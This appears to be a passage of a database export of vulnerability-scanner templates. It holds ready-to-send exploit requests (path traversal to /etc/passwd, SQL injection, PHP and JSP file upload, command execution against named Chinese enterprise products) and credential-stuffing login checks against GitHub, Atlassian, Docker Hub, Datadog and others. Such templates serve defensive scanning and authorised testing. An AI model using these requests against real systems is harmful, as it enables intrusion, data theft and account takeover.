\"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={(unknown)}.txt\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: header\n words:\n - 'filename='\n - 'application/octet-stream'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b2f4c83664a3551071fd365e79502f07f19b3a4270b772692743ca3a78625e5d022100c95a9507e707152572170ea39f82bc646218bbb46f592fbad2474a04d797a37a:922c64590222798bb761d5b6d8e72950", "hash": "62d443852fb685402c2533afec60ca5b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1d" }, "name": "CNVD-2021-43984.yaml", "content": "id: CNVD-2021-43984\n\ninfo:\n name: MPSec ISG1000 Security Gateway - Arbitrary File Download\n author: DhiyaneshDk\n severity: high\n description: |\n The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. 
has an arbitrary file download vulnerability, which attackers can use to obtain sensitive information.\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984\n - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml\n metadata:\n verified: true\n max-request: 1\n fofa-query: \"迈普通信技术股份有限公司\"\n tags: cnvd2021,cnvd,mpsec,maipu,lfi,isg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n - \"USGSESSID=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cde6f299fa9dcf25f8392e07f90f53acd5a9ef19c1ad7f1dc0c0ac42932945be02205188ca41cd7dc765aeb1c0114d3d488df0f92c32fec8b211ee98aae1d79a7e54:922c64590222798bb761d5b6d8e72950", "hash": "cdc6ebef6ff7304d42420439a4b05a44", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1e" }, "name": "CNVD-2021-49104.yaml", "content": "id: CNVD-2021-49104\n\ninfo:\n name: Pan Micro E-office File Uploads\n author: pikpikcu\n severity: critical\n description: The running version of Pan Wei Micro E-office allows arbitrary file uploads by a remote attacker.\n remediation: Pan Wei has released an update to resolve this vulnerability.\n reference:\n - https://chowdera.com/2021/12/202112200602130067.html\n - http://v10.e-office.cn\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\n cvss-score: 9.9\n cwe-id: CWE-434\n metadata:\n max-request: 2\n tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\n\n --e64bdf16c554bbc109cecef6451c26a4\n Content-Disposition: form-data; name=\"Filedata\"; 
filename=\"{{randstr}}.php\"\n Content-Type: image/jpeg\n\n \n\n --e64bdf16c554bbc109cecef6451c26a4--\n - |\n GET /images/logo/logo-eoffice.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"94d01a2324ce38a2e29a629c54190f67\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220384c6063def534ec0a814462caa5c044f86fa88e02b0a86416081f5adfd949d7022100fd2c2b727b05bfa5f1a00b106da9e0e3c523181f8d952566e32aab8e266c46db:922c64590222798bb761d5b6d8e72950", "hash": "ca8cf7738439653092d59d4973320293", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e1f" }, "name": "CNVD-2022-03672.yaml", "content": "id: CNVD-2022-03672\n\ninfo:\n name: Sunflower Simple and Personal - Remote Code Execution\n author: daffainfo\n severity: critical\n description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.\n reference:\n - https://www.1024sou.com/article/741374.html\n - https://copyfuture.com/blogs-details/202202192249158884\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 2\n tags: cnvd,cnvd2022,sunflower,rce\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/rpc HTTP/1.1\n Host: {{Hostname}}\n\n action=verify-haras\n - |\n GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1\n Host: {{Hostname}}\n Cookie: CID={{cid}}\n\n extractors:\n - type: regex\n name: cid\n internal: true\n group: 1\n regex:\n - '\"verify_string\":\"(.*?)\"'\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1==200\"\n - \"status_code_2==200\"\n - \"contains(body_1, 'verify_string')\"\n - \"contains(body_2, 'Windows IP')\"\n condition: and\n# digest: 
4a0a004730450220390bd0f291ed6719ac99f1b99704321d1d494d765e27a461bfa4e40e2c5b1de3022100e455e5442cc085d18b9510c673ce41df4cfabc49acf8e45f5bb687cca53a4f9e:922c64590222798bb761d5b6d8e72950", "hash": "073e090300957e105aec752ded5a5621", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e20" }, "name": "CNVD-2022-42853.yaml", "content": "id: CNVD-2022-42853\n\ninfo:\n name: ZenTao CMS - SQL Injection\n author: ling\n severity: critical\n description: |\n ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n reference:\n - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-89\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.title:\"zentao\"\n fofa-query: \"Zentao\"\n tags: cnvd,cnvd2022,zentao,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /zentao/user-login.html HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/zentao/user-login.html\n\n account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1\n\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n\n# digest: 4a0a00473045022009572d4885de4de6ef2312a58a67d6c67fefd27b962fa80a8e3864193987c66f022100e190d2836fe344522dc84ded60b1213a62631baac598ca6dd444edfff9ec535c:922c64590222798bb761d5b6d8e72950\n", "hash": "07e58f0b2941102d1ff0b69738b7f77c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e21" }, "name": "CNVD-2022-43245.yaml", "content": "id: CNVD-2022-43245\n\ninfo:\n name: Weaver OA XmlRpcServlet - Arbitrary File Read\n author: SleepingBag945\n severity: high\n 
description: |\n e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.\n metadata:\n verified: true\n max-request: 1\n fofa-query: app=\"泛微-协同办公OA\"\n tags: cnvd,cnvd2022,weaver,e-office,oa,lfi\n\nhttp:\n - raw:\n - |\n POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n WorkflowService.getAttachment\n /etc/passwd\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n\n# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950\n", "hash": "937efb3baf291f1d4de9483562649e52", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e22" }, "name": "CNVD-2022-86535.yaml", "content": "id: CNVD-2022-86535\n\ninfo:\n name: ThinkPHP Multi Language - File Inc & Remote Code Execution (RCE)\n author: arliya,ritikchaddha\n severity: high\n description: |\n ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. 
Attackers can use this vulnerability to execute commands.\n reference:\n - https://cn-sec.com/archives/1465289.html\n - https://blog.csdn.net/qq_60614981/article/details/128724640\n - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535\n metadata:\n verified: true\n max-request: 3\n tags: cnvd,cnvd2022,thinkphp,rce\n\nhttp:\n - raw:\n - |\n GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1\n Host: {{Hostname}}\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n think-lang: ../../../../../usr/local/php/pearcmd\n - |\n GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: or\n matchers:\n - type: word\n part: set_cookie\n words:\n - \"think_lang=..%2F..%2F..%2F..%2F\"\n\n - type: word\n part: body_3\n words:\n - \"CONFIGURATION\"\n - \"Successfully created\"\n condition: and\n\n# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950\n", "hash": "209f6820ae6bbce607c199b438ee2cad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e23" }, "name": "CNVD-2023-08743.yaml", "content": "id: CNVD-2023-08743\n\ninfo:\n name: Hongjing Human Resource Management System - SQL Injection\n author: SleepingBag945\n severity: critical\n description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\n reference:\n - https://www.henry4e36.top/index.php/archives/162.html\n - https://blog.csdn.net/qq_41904294/article/details/130944159\n metadata:\n verified: true\n max-request: 1\n fofa-query: title=\"人力资源信息管理系统\"\n tags: cnvd2023,cnvd,hongjing,hcm,sqli\n\nhttp:\n - raw:\n - |\n GET 
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header,\"text/xml\")'\n - 'contains_all(body,\"TreeNode id=\\\"hongjing\",\"SQL Server\")'\n condition: and\n# digest: 4a0a00473045022059810b4634d6fa7f6cce54d1ed52789c775deae48194b5929fdbe72f748f6909022100f7d9a0278a803bf1b29c9f178435623abb03589ec17bc66a88c2f1366ef5d642:922c64590222798bb761d5b6d8e72950", "hash": "6aed01711b9edb9ef34948f27d094e65", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e24" }, "name": "CNVD-2023-12632.yaml", "content": "id: CNVD-2023-12632\n\ninfo:\n name: E-Cology V9 - SQL Injection\n author: daffainfo\n severity: high\n description: |\n Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.\n reference:\n - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003\n - https://blog.csdn.net/qq_50854662/article/details/129992329\n metadata:\n verified: true\n max-request: 1\n shodan-query: 'ecology_JSessionid'\n fofa-query: app=\"泛微-协同商务系统\"\n tags: cnvd,cnvd2023,ecology,sqli\n\n# a' union select 1,''+(SELECT md5(9999999))+'\n# URL encoded 3 times\nhttp:\n - raw:\n - |\n POST /mobile/plugin/browser.jsp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '283f42764da6dba2522412916b031080'\n - '\"autoCount\"'\n - '\"autoGet\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n# digest: 4a0a00473045022100ac8d7d77e7fc71d72ed50693564d11a326afd1e25d223a0089bea19f7f2776370220530d4c64341f3cb397f5a7765569d5d626dbf4a0b8d114ef8c9ad1af078f1061:922c64590222798bb761d5b6d8e72950\n", "hash": "328e9b111ba4ed9debd38b6ad7a5aa84", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e25" }, "name": "CNVD-2023-96945.yaml", "content": "id: CNVD-2023-96945\n\ninfo:\n name: McVie Safety Digital Management Platform - Arbitrary File Upload\n author: DhiyaneshDk\n severity: high\n description: |\n Jiangsu Maiwei 
Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.\n reference:\n - https://blog.csdn.net/weixin_42628854/article/details/136036109\n metadata:\n verified: true\n max-request: 1\n fofa-query: \"安全生产数字化管理平台\"\n tags: cnvd,cnvd2023,file-upload,mcvie\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Content/Plugins/uploader/FileChoose.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"选择文件\"\n - \"提交\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950", "hash": "c52b3b8ac832c680f87dbd6c3fad0ac8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e26" }, "name": "CNVD-C-2023-76801.yaml", "content": "id: CNVD-C-2023-76801\n\ninfo:\n name: UFIDA NC uapjs - RCE vulnerability\n author: SleepingBag945\n severity: critical\n description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. 
By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.\n metadata:\n max-request: 2\n tags: cnvd,cnvd2023,yonyou,rce,intrusive\n\nhttp:\n - raw:\n - |\n POST /uapjs/jsinvoke/?action=invoke HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded;charset=UTF-8\n\n {\"serviceName\":\"nc.itf.iufo.IBaseSPService\",\"methodName\":\"saveXStreamConfig\",\n \"parameterTypes\":[\"java.lang.Object\",\"java.lang.String\"],\n \"parameters\":[\"{{randstr_2}}\",\"webapps/nc_web/{{randstr_1}}.jsp\"]}\n - |\n GET /{{randstr_1}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_1 == 200\n - status_code_2 == 200 && contains(body_2,\"{{randstr_2}}\")\n condition: and\n\n# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950\n", "hash": "fab30ed1ecc13e7deed309c5f520fd92", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e27" }, "name": "atechmedia-codebase-login-check.yaml", "content": "id: atechmedia-codebase-login-check\n\ninfo:\n name: Atechmedia/Codebase Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid Atechmedia/Codebase account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,atechmedia,codebase\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://identity.atechmedia.com/login HTTP/1.1\n Host: identity.atechmedia.com\n Referer: https://identity.atechmedia.com/login\n - |\n POST https://identity.atechmedia.com/login HTTP/1.1\n Host: identity.atechmedia.com\n Origin: https://identity.atechmedia.com\n Content-Type: application/x-www-form-urlencoded\n Referer: https://identity.atechmedia.com/login\n\n 
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login\n\n extractors:\n - type: xpath\n name: authenticity_token\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div/div[2]/div/form/input[2]\n\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Set-Cookie: user_session'\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100b6260850c8884a11dfab10badc50eca9b785dc2db129f54b76e9605d49a30ebd0221009c6a4578217807fba1884a34be4e6e00b9d627a71fb62fd024876cee11219fe7:922c64590222798bb761d5b6d8e72950", "hash": "9c2d3020f7f51a862b6133c645b081fc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e28" }, "name": "atlassian-login-check.yaml", "content": "id: atlassian-login-check\n\ninfo:\n name: Atlassian Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid atlassian account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,atlassian\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://auth.atlassian.com/co/authenticate HTTP/1.1\n Host: auth.atlassian.com\n Content-Type: application/json\n Origin: https://id.atlassian.com\n Referer: https://id.atlassian.com/\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"state\":{\"csrfToken\":\"{{rand_text_alpha(10, \"\")}}\"}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"error_description\":\"Wrong email or password.\"'\n\n - type: status\n status:\n - 403\n# digest: 
4a0a0047304502210083c73505e66eaf278170bb782317370fa97a3e1415caebb9641f7632b44303c802207bda547ec71a5e97a812ea525a5f3f0217bd34d60c77ef3d1782c8da03c57192:922c64590222798bb761d5b6d8e72950", "hash": "3741d64b0e3b4cc37f0a133ad7a3998f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e29" }, "name": "avnil-pdf-generator-check.yaml", "content": "id: avnil-pdf-generator-check\n\ninfo:\n name: useanvil.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid avnil pdf generator account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,avnil-pdf\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://graphql.useanvil.com/ HTTP/1.1\n Host: graphql.useanvil.com\n Content-Length: 367\n Content-Type: application/json\n\n {\"operationName\":\"LoginMutation\",\"variables\":{\"email\":\"{{username}}\",\"password\":\"{{password}}\"},\"query\":\"mutation LoginMutation($email: String, $password: String) {\\n login(email: $email, password: $password) {\\n eid\\n firstName\\n lastName\\n email\\n preferences {\\n require2FA\\n __typename\\n }\\n extra\\n __typename\\n }\\n}\\n\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"email\":\"'\n - '\"eid\":\"'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206b4fbc67413049130a87be6c047ed7ae4cb323da4b195608526619668e467272022100986ad99ae0c941bfef37cbd6df9fa30798f45445eaf38a1be2696c142122e7a0:922c64590222798bb761d5b6d8e72950", "hash": "c804c332603e2cf7ead9d6bc34e94a21", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2a" }, "name": "chefio-login-check.yaml", "content": "id: chefio-login-check\n\ninfo:\n name: Chef.io Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks 
for a valid chef.io account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,chefio\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://api.chef.io/login HTTP/1.1\n Host: api.chef.io\n Content-Type: application/x-www-form-urlencoded\n\n utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: https://api.chef.io/login-success'\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402200a063ef899b05c8a1eb9e1d206605e6dbd609a21cfec53f816ce7182be3f96440220724acc9b86e65591636033b6723c4f84a8100ee1658147dae30e6e577180faae:922c64590222798bb761d5b6d8e72950", "hash": "653d7eac9ccdcc83aeb03a77281cf73a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2b" }, "name": "codepen-login-check.yaml", "content": "id: codepen-login-check\n\ninfo:\n name: codepen.io Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid codepen account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: creds-stuffing,login-check,cloud,codepen\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://codepen.io/login HTTP/1.1\n Host: codepen.io\n - |\n POST https://codepen.io/login/login HTTP/1.1\n Host: codepen.io\n Content-Type: application/x-www-form-urlencoded\n X-CSRF-Token: {{token}}\n\n authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n - type: xpath\n part: body\n xpath:\n - '//input[@name=\"authenticity_token\"]/@value'\n name: token\n internal: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n negative: true\n 
words:\n - 'The username or password you entered is incorrect, please try again.'\n\n - type: status\n status:\n - 302\n# digest: 4a0a004730450220240c8ccd616b07ac1a9d8fb6349109ecb6d2f59c9e971f041a9f4dc8651ce4ee022100c147a0c19edbc873bfa37c680e3b60c60889eae68fc595aafb1953abe5b8ecb5:922c64590222798bb761d5b6d8e72950", "hash": "bdd0e1aa88e926a6d66d92317b791846", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2c" }, "name": "datadog-login-check.yaml", "content": "id: datadog-login-check\n\ninfo:\n name: Datadog Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid datadog account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,datadog\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://app.datadoghq.com/account/login HTTP/1.1\n Host: app.datadoghq.com\n - |\n POST https://app.datadoghq.com/account/login? 
HTTP/1.1\n Host: app.datadoghq.com\n Content-Type: application/x-www-form-urlencoded\n\n _authentication_token={{auth_token}}&username={{username}}&password={{password}}\n\n extractors:\n - type: regex\n name: auth_token\n part: body\n internal: true\n group: 1\n regex:\n - \"authentication_token": "(.*?)",\"\n\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Set-Cookie: dogweb='\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100aa2b6771fbb1038da3c1c37c928dede765fa0708b531d3286a84fb51a02df60d022100ee5cf0d2eb452ee533d1bb2cdb5f52a8061c386ef5d491481bcba4dcd58ae228:922c64590222798bb761d5b6d8e72950", "hash": "97e204366376d23bed26a89d7dc0b733", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2d" }, "name": "docker-hub-login-check.yaml", "content": "id: docker-hub-login-check\n\ninfo:\n name: Docker Hub Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid Docker Hub account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: creds-stuffing,login-check,cloud,docker\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://hub.docker.com/v2/users/login HTTP/1.1\n Host: hub.docker.com\n Content-Type: application/json\n\n {\n \"username\": \"{{username}}\",\n \"password\": \"{{password}}\"\n }\n\n threads: 30\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'token'\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: token='\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n# digest: 490a004630440220745f50f1f9929bf2e910c2ffa2181ee5d12847b0c2c17fe255f2e126c6a2c0e0022009c805748a4019d0469aad7016648e5a312bbc81c14d8ea16b25bc68da02f1e9:922c64590222798bb761d5b6d8e72950", "hash": 
"03143beffdc027d21baafe61600d91e8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2e" }, "name": "gitea-login-check.yaml", "content": "id: gitea-login-check\n\ninfo:\n name: gitea.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid gitea account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,gitea\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://gitea.com/user/login HTTP/1.1\n Host: gitea.com\n Content-Type: application/x-www-form-urlencoded\n\n user_name={{username}}&password={{password}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: /'\n\n - type: status\n status:\n - 303\n# digest: 480a00453043021f44ce0e3314926c5c7af6fac3a4007b5bff8bd3d74bbab5a01650ce416c23b702203adeef088e9527e141d289583f052f2d714a593f89a3e49f36a9e5fdcf321779:922c64590222798bb761d5b6d8e72950", "hash": "07422605429264029ed964423dbb4e4f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2f" }, "name": "github-login-check.yaml", "content": "id: github-login-check\n\ninfo:\n name: Github Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid github account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,github\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://github.com/login HTTP/1.1\n Host: github.com\n - |\n POST https://github.com/session HTTP/1.1\n Host: github.com\n Origin: https://github.com\n Content-Type: application/x-www-form-urlencoded\n Referer: https://github.com/login\n\n 
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}\n\n extractors:\n - type: xpath\n name: authenticity_token\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/input[1]\n\n - type: xpath\n name: timestamp\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/div/input[10]\n\n - type: xpath\n name: timestamp_secret\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/div/input[11]\n\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: or\n matchers:\n - type: dsl\n name: 2fa\n dsl:\n - \"contains(location, 'https://github.com/sessions/two-factor')\"\n - \"status_code==302\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(to_lower(header), 'set-cookie: logged_in=yes')\"\n - \"contains(to_lower(header), 'set-cookie: user_session=')\"\n - 